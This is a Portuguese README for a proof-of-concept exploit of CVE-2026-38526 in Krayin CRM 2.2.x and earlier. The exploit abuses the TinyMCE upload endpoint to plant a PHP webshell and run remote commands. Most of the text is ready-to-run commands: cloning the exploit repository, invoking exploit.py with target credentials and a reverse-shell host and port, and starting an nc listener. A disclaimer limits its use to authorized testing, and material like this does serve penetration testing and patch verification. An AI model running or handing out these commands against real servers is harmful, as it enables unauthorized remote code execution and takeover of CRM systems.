
Prova de Conceito do CVE-2026-38526 no Krayin CRM <= v2.2.x. Upload Arbitrário de Arquivos levando à Execução Remota de Código.
Krayin CRM (≤ 2.2.x) - Upload de arquivo irrestrito levando à Execução Remota de Código.
Este PoC explora o endpoint vulnerável de upload do TinyMCE (/admin/tinymce/upload) para enviar um webshell PHP e obter execução de comandos no servidor.
git clone https://github.com/pawpic/CVE-2026-38526-POC
pip3 install requests beautifulsoup4
Uso
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
--lhost YOUR_IP \
--lport 4444
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
-c "whoami"
Iniciar listener:
nc -lvnp 4444
Executar o exploit:
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR
Este exploit é destinado apenas para fins educacionais e testes de penetração autorizados. O uso não autorizado contra sistemas para os quais você não tem permissão explícita para testar é ilegal.
Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526
Autor: pawpic Data: 2026
| Argumento | Descrição | Obrigatório |
|---|
| -u, --url | URL base do alvo | Sim |
| -e, --email | Email de login | Sim |
| -p, --password | Senha de login | Sim |
| -c, --cmd | Executa comando único | Não |
| --lhost | Seu IP para reverse shell | Sim (se não usar --cmd) |
| --lport | Porta de escuta | Não (padrão: 4444) |